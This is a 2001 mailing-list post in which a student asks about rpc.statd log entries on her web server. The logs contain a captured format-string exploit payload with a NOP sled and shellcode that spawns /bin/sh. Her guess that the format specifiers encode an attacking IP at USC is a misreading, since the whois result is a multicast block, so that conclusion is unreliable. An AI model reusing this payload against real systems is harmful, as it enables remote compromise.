[techtalk] Should I feel honored?

Kath ranger at optonline.net
Fri Apr 20 17:39:38 EST 2001 

I decided to review my own logs (I know I should do it more often).

Apparently, my web server has been attacked repeatedly and if the IP is true (If I am reading it right, maybe it is just mumbo jumbo I'm misinterpreting), it is coming from USC.
Here is the log:

Apr 18 15:25:08 hwnet /sbin/rpc.statd[177]: gethostbyname error for ^X\xf7\xff\xbf^X\xf7\xff\xbf^Y\xf7\xff\xbf^Y\xf7\xff\xbf^Z\xf7\xff\xbf^Z\xf7\xff\xbf^[\xf7
\xff\xbf^[\xf7\xff\xbf%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Apr 18 15:25:08 hwnet \xc7^F/bin\xc7F^D/shA0\xc0\210F^G\211v^L\215V^P\215N^L\211\xf3\xb0^K\xcd\200\xb0^A\xcd\200\xe8\177\xff\xff\xff

Now, if I am not reading too much into it, I clearly see the IP "236x%n%137x%n%10x%n%192".  Does that mean 236.137.10.192?  

Now popping that IP into the whois at arin.net yielded this:
University of Southern California (NET-MCAST-NET)
   Information Sciences Institute
   4676 Admiralty Way
   Marina Del Rey, CA 90292-6695
   US

   Netname: MCAST-NET
   Netblock: 224.0.0.0 - 239.255.255.255

   Coordinator:
      Internet Corporation for Assigned Names and Numbers  (IANA-ARIN)  iana at IANA.ORG
      (310) 823-9358

   Domain System inverse mapping provided by:

   FLAG.EP.NET   198.32.4.13
   STRUL.STUPI.SE  192.108.200.1 192.36.143.3
   NS.ISI.EDU   128.9.128.127
   NIC.NEAR.NET   192.52.71.4

   Record last updated on 12-Sep-2000.
   Database last updated on 20-Apr-2001 00:14:29 EDT.

Could it be a spoofed address?  A compromised machine doing the scanning?  Some script kiddy kid sitting in his dorm room?

What is my course of action now?  My main page hasn't been defaced with pictures of someones grandma in compromising poses, so I guess that is a good first sign the attack didn't work?  Or did it work and my machine has been compromised and is now being used for DDoS or a w4r3z britney spears mp3 porn server?

I will notify the sysadmin of my school district (I'm a student) of this of course.

If that IP is true, should I be contacting a USC sysadmin?  I would feel especially responsible if it was some poor sysadmin's compromised machine at another school.

- Kath, the perpetually worried
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://linuxchix.org/pipermail/techtalk/attachments/20010420/9dbf1e00/attachment.xhtml

More information about the Techtalk mailing list